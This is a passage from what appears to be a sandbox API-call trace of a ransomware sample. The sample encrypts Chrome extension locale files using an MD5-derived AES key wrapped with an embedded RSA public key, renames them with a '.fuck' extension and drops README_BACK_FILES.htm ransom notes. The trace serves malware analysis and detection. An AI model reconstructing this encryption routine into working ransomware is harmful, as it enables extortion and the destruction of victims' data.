lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.372] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.372] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.373] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.373] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.373] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.373] GetLastError () returned 0x0 [0248.373] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0248.373] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0248.373] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.374] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.375] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.375] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.377] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.377] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.377] CryptHashData (hHash=0x29389f8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.377] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29389f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.377] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.377] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.377] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293cac8) returned 1 [0248.377] CryptImportPublicKeyInfo (in: hCryptProv=0x293cac8, dwCertEncodingType=0x1, pInfo=0x292fe20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292fe50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292fe58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936f38) returned 1 [0248.377] CryptEncrypt (in: hKey=0x2936f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.377] CryptEncrypt (in: hKey=0x2936f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c710*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c710*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.378] WriteFile (in: hFile=0x5d58, lpBuffer=0x293c710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c710*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.378] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.379] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.379] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.379] CloseHandle (hObject=0x5d5c) returned 1 [0248.379] CloseHandle (hObject=0x5d58) returned 1 [0248.380] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0248.382] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0248.383] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0248.384] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.fuck")) returned 1 [0248.384] CryptDestroyHash (hHash=0x29389f8) returned 1 [0248.385] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.385] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.385] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.385] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.385] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0248.385] AreFileApisANSI () returned 1 [0248.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0248.385] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.385] GetFileType (hFile=0x5d50) returned 0x1 [0248.385] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.387] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.387] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0248.390] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.390] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.390] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.390] GetLastError () returned 0x0 [0248.390] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json")) returned 0x20 [0248.390] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0248.390] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.391] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.391] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.392] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.393] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.393] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.393] CryptHashData (hHash=0x29387f8, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.393] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.393] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.393] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.393] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293cce8) returned 1 [0248.394] CryptImportPublicKeyInfo (in: hCryptProv=0x293cce8, dwCertEncodingType=0x1, pInfo=0x292fef0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292ff20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292ff28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29372b8) returned 1 [0248.394] CryptEncrypt (in: hKey=0x29372b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.394] CryptEncrypt (in: hKey=0x29372b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293cd70*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293cd70*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.394] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293cd70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293cd70*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.395] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xde, lpOverlapped=0x0) returned 1 [0248.396] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xde, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.396] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.397] CloseHandle (hObject=0x5d58) returned 1 [0248.397] CloseHandle (hObject=0x5d5c) returned 1 [0248.397] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0248.400] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0248.400] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0248.401] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0248.402] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.402] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.402] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.402] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.402] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.402] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0248.402] AreFileApisANSI () returned 1 [0248.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.403] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.403] GetFileType (hFile=0x5d50) returned 0x1 [0248.403] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.404] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.404] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.404] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.404] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.404] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.404] GetLastError () returned 0x0 [0248.404] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json")) returned 0x20 [0248.405] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0248.405] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.405] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.406] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.407] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.409] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.409] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.409] CryptHashData (hHash=0x2938af8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.409] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938af8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938978) returned 1 [0248.409] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 